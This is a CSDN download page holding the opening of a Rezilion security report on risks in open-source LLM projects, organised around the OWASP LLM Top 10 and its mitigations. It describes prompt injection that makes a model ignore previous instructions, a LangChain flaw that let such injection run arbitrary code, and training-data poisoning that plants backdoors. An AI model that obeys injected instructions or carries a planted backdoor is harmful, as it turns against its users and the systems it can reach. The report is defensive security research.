大语言模型开源安全环境报告.pdf资源-CSDN文库

需积分: 5 32 浏览量 2023-07-02 11:48:30 上传评论收藏 3.15MB PDF 举报

资源推荐

资源详情

资源评论

Rezilion

Research

BY YOTAM PERKAL AND KATYA DONCHENKO

Introduction

GENERATIVE ARTIFICIAL INTELLIGENCE (AI) HAS EXPERIENCED A REMARKABLE RISE IN RECENT YEARS,

revolutionizing how we create, interact with, and consume digital content. With the advent of Large

Language Models (LLMs) like GPT (Generative Pre-Trained Transformer), the capabilities of Generative AI

have reached unprecedented levels, enabling machines to generate human-like text, images, and even

code. However, as with any transformative technology, the adoption of Generative AI also brings forth a

set of challenges, particularly in the realm of security. In this research, we will delve into the emergence of

Generative AI, addressing not only the security concerns related to Large Language Models (LLMs) but also

the broader security considerations accompanying the adoption of any new technology.

Generative AI models are making their way to more and more industries, including healthcare, nance,

transportation, entertainment, real estate, education, and even cybersecurity. They are becoming

integral to search engines, voice assistants, social networks, and more. It seems that every day a different

company announces a new Generative AI-based capability.

In the rush to quickly go to market, is enough focus being put on the security aspects of this new

technology? Are proper risk assessments being conducted? Are the inherent shortcomings of these

models taken into account? Are proper security controls put in place to prevent their abuse? We will show

through our research on this topic, the unfortunate answer to these questions is that not enough is being

done to address the security risks inherent to these technologies.

Attackers are already starting to take notice and exploit the surging popularity of these Generative

AI-based models to their advantage. In a recent example, a fake GPT project recently revealed by the

Sonicwall Capture Labs research team claimed to provide a better AI tool than ChatGPT. Upon installation,

the project opens the Chrome browser with the real OpenAI website leading the victim to believe that

the real ChatGPT was installed. Yet silently, it executes a batch le named g pt 4.b at which in turn loads a

malicious browser extension named “dmkamcknogkgcdfhhbddcghachkejeapgpt4” containing obfuscated

javascript code whose primary function is to steal Facebook cookies.

www.rezilion.com

ExplAIning the Risk: Exploring the Large Language Models Open-Source Security Landscape

EXPL NING THE RISK:

Exploring the Large

Language Models Open-Source

Security Landscape

www.rezilion.com

ExplAIning the Risk: Exploring the Large Language Models Open-Source Security Landscape

Rezilion

Research

Risk CategoryCategory

LLM01:2023 —

Prompt Injections

LLM02:2023 —

Data Leakage

LLM03:2023 —

Inadequate Sandboxing

LLM04:2023 —

Unauthorized

Code Execution

LLM05:2023 —

SSRF Vulnerabilities

LLM06:2023 —

Overreliance on LLM-

generated Content

LLM07:2023 —

Inadequate AI Alignment

LLM08:2023 —

Insufcient Access

Controls

LLM09:2023 —

Improper Error Handling

LLM10:2023 —

Training Data Poisoning

Trust Boundary Risk/

Inherent Model Risk

Data Management Risk

Trust Boundary Risk

Inherent Model Risk

Trust Boundary Risk/

Basic Security

Best Practice

Basic Security

Best Practice

Data Management Risk

Bypassing lters or manipulating the LLM

using carefully crafted prompts that make the

model ignore previous instructions or perform

unintended actions.

Accidentally revealing sensitive information,

proprietary algorithms, or other condential

details through the LLM’s responses.

Failing to properly isolate LLMs when they

have access to external resources or sensitive

systems, allowing for potential exploitation

and unauthorized access.

Exploiting LLMs to execute malicious code,

commands, or actions on the underlying

system through natural language prompts.

Exploiting LLMs to perform unintended

requests or access restricted resources, such

as internal services, APIs, or data stores.

Excessive dependence on LLM-generated

content without human oversight can result

in harmful consequences.

Failing to ensure that the LLM’s objectives

and behavior align with the intended use

case, leading to undesired consequences

or vulnerabilities.

Not properly implementing access controls

or authentication, allowing unauthorized

users to interact with the LLM and potentially

exploit vulnerabilities.

Exposing error messages or debugging

information that could reveal sensitive

information, system details, or potential

attack vectors.

Maliciously manipulating training data or

ne-tuning procedures to introduce

vulnerabilities or backdoors into the LLM.

Security Risks in LLM Projects

OWASP RECENTLY RELEASED A DRAFT OF THE OWASP TOP 10 SECURITY RISKS LIST for Large Language Model

Applications. With this resource, we can better understand the important vulnerability types for Articial

Intelligence (AI) applications built on Large Language Models (LLMs).

www.rezilion.com

ExplAIning the Risk: Exploring the Large Language Models Open-Source Security Landscape

Rezilion

Research

Generally speaking, while there is some overlap, we can divide the risks into several groups:

Trust Boundary Risk

Data Management Risk

Inherent Model Risk

Basic Security Best Practice

Let’s explore each group of risks:

Trust Boundary Risk

Risks such as inadequate sandboxing, unauthorized code execution, SSRF vulnerabilities, insufcient access

controls, and even prompt injections in a sense, all fall under the general concept of trust boundaries.

Trust boundaries help us establish zones of trust where we have condence in the security and reliability

of the components and data within them. Beyond these boundaries, there is a level of uncertainty and

potential risk. By dening trust boundaries, we can implement appropriate security measures and controls

to protect our sensitive information and ensure that only authorized access and interactions occur within

trusted areas. Trust boundaries are virtual fences that help us maintain a secure environment and protect

our digital assets from potential threats.

HOW DOES IT MANIFEST?

In the context of LLMs, trust boundary risks are specically signicant as users enable LLMs to utilize external

resources such as databases, search interfaces, or external computing tools, which can greatly enhance

their functionalities. Nonetheless, the inherent unpredictability of LLM completion outputs necessitates

cautious integration to prevent potential manipulation by malicious actors. Failure to address this concern

adequately can signicantly elevate the risks associated with these models.

For the purposes of this analysis, we have included prompt injection under the trust boundary risks category

because once plugins are being used (meaning the Large Language Model now has the ability to call one

or more different APIs), prompt injections can be used to cross trust boundaries.

Recognizing that attackers can extract or manipulate any information provided in the prompt is crucial.

Merely protecting LLM models at the prompt level is inadequate, as the root issue lies in the incorrect

establishment of trust boundaries. It’s important to understand that anyone who can input text into the LLM,

including users, accessed websites, and LLM plugins, can inuence its output.

This emphasizes the necessity of addressing trust boundaries, threat models, and authorization concerns

instead of treating them as complex AI problems. By acknowledging the potential manipulation of LLMs and

applying appropriate trust to their output, we can approach their integration more effectively and mitigate

potential risks.

There have already been examples of such issues in the wild. For example, CVE-2023-29374, a vulnerability

in LangChain (the third most-popular open-source GPT-based project at this time), made it susceptible to

prompt injection attacks that can execute arbitrary code via the Python exec method.

www.rezilion.com

ExplAIning the Risk: Exploring the Large Language Models Open-Source Security Landscape

Rezilion

Research

HOW CAN THE RISK BE MITIGATED?

In the same way, security guardrails have been developed around common risks in the software

development domain, AI models and their encompassing ecosystem must develop the same

compensating controls and best practices.

For example, to prevent SQL injections, we have learned as an industry to apply strategies such as input

validation and sanitization; the same techniques must be adapted to address prompt injection risk.

For example, if possible, refrain from allowing free-form text input from being fed directly to the LLM, instead,

opt for having a standard set of options (a dropdown list, for example) from which the user can choose how

to interact with the model.

If freeform input is required, implement strict input validation and sanitization of user-provided prompts. Be

sure to constantly update and ne-tune the LLM to improve its understanding of malicious inputs and edge

cases, and monitor and log all LLM interactions to detect and analyze potential prompt injection attempts.

Additionally, it is imperative to enforce proper sandboxing and segregation by restricting the LLM’s access to

network resources, internal services, and APIs.

Data Management Risk

Risks such as data leakage and training data poisoning fall under the data management risks category.

These risks are relevant to any machine learning system and are not unique to Large Language Models, yet

they should be addressed nonetheless.

HOW DOES IT MANIFEST?

Training data poisoning refers to the deliberate manipulation of an LLM’s training data or ne-tuning

procedures by an attacker to introduce vulnerabilities, backdoors, or biases that can undermine the

security, effectiveness, or ethical behavior of the model. This malicious act aims to compromise the integrity

and reliability of the LLM by injecting misleading or harmful information during the training process.

Data leakage refers to an LLM’s unintentional disclosure of sensitive information, proprietary algorithms, or

other condential details in its responses. This inadvertent disclosure can lead to unauthorized access to

valuable data or intellectual property, compromising privacy and giving rise to various security breaches.

An additional concern related to the disclosure of private data is the potential for ChatGPT to reveal

personal information, leading to the dissemination of speculative or harmful content.

HOW CAN THE RISK BE MITIGATED?

Training data must be sourced from reliable and veried sources. Its integrity should also be veried by

conducting thorough quality validation as well as employing robust data sanitization and preprocessing

techniques to eliminate vulnerabilities and biases and ensure its reliability and fairness.

Strict output ltering and context-aware mechanisms to safeguard against the inadvertent disclosure of

sensitive information by the LLM should be employed to address data leakage risks.

Differential privacy techniques or other data anonymization methods could also be applied during the LLM’s

training to mitigate the risks of overtting and memorization. It is advised to conduct regular audits and

reviews of the LLM’s responses to identify and proactively prevent any unintended disclosure of sensitive

information. Additionally, comprehensive monitoring and logging practices should be used to detect and

analyze potential data leakage incidents arising from LLM interactions.

剩余28页未读，继续阅读

评论收藏

内容反馈

zhao-lucy

粉丝: 19
资源: 446

大语言模型开源安全环境报告.pdf

Stable Diffusion公司发布首个大语言模型StableLM，已开源公测！.pdf

开源大语言模型(LLM)汇总（持续更新中）.pdf

微软开源DeepSpeedChat，昆仑万维大模型“天工”将发布.pdf

计算机行业深度研究：LLaMA等开源模型凸显先进算法及行业数据的重要性.pdf

Eclipse权威开发指南2.pdf

论文研究-AADL模型代码自动生成技术研究.pdf

Eclipse权威开发指南3.pdf

Eclipse权威开发指南1.pdf

R语言资料大全 of 数据分析玩家

震撼开源！首个1万多人共同标注的35种语言的高质量对话数据集来啦.pdf

半导体行业周报：多款AI模型发布，半导体板块止跌反弹.pdf

MapReduce_新型的分布式并行计算编程模型_李成华.pdf

PyTorch官方教程中文版.pdf

阿里通义千问测评：国内一线，积极追赶.pdf

Python自然语言处理-BERT实战

计算机行业2023年7月暨中期投资策略：紧抓算力、大模型、应用迭代周期，把握AI带来信息产业革命-国信证券.pdf

pytorch中文文档.pdf

最新版ISO/IEC 27001:2022、ISO 27002:2022中英文合集

Goby红队版-win-x64-2.4.7版本

Chrome Header Editor 插件

ISO SAE 21434-2021 中文版.pdf

OpenVAS GVM 中文翻译补丁

安全认证cisp教材全套

现代永磁同步电机控制原理及MATLAB仿真__袁雷编著1

全面的安全基线核查清单

OpenVAS离线资源

STM32F103C8T6核心板-电路原理图1.PDF

最新资源